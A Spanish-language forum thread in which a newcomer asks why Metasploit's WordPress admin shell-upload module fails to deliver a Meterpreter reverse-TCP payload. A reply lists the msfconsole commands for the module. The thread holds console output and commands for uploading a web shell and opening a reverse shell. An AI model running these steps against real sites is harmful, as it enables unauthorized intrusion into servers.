Exploit para wordpress

Iniciado por k4rv, 12 Abril 2018, 22:11 PM

0 Miembros y 1 Visitante están viendo este tema.

k4rv

Muy buenas a todos, lo primero de todo saludaros pues soy nuevo. (y como suele ocurrir siempre nos solemos animar por dudas)
Creo que no me equivoco de hilo..no soy experto.

El problema que tengo es un exploit para wordpress "unix/webapp/wp_admin_shell_upload", en el cual dentro de sus opciones tengo la validación "ok" de usuario administrador pero al cargar payload tengo problemas y me sale lo siguiente:

  • Started reverse TCP handler on 192.168.138.145:4444
  • Authenticating with WordPress using admin:admin...
  • Authenticated with WordPress
  • Preparing payload...
  • Uploading payload...
    [-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
  • Exploit completed, but no session was created.


    En este intento concretamente lo intente con el payload: "php/meterpreter/reverse_tcp"
    pero tambien lo intente con otros y el mismo resultado.
    He desactivado el firewall por si acaso.

    Alomejor es problema de vulnerabilidad pero no estoy seguro.

    Mil gracias de antemano
    Saludos

Shell Root

Código (bash) [Seleccionar]
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > show targets
...targets...
msf exploit(wp_admin_shell_upload) > set TARGET <target-id>
msf exploit(wp_admin_shell_upload) > show options
...show and set options...
msf exploit(wp_admin_shell_upload) > exploit


:https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

k4rv

Esta tarde le doy más vueltas según tu respuesta.

Muchas gracias ;)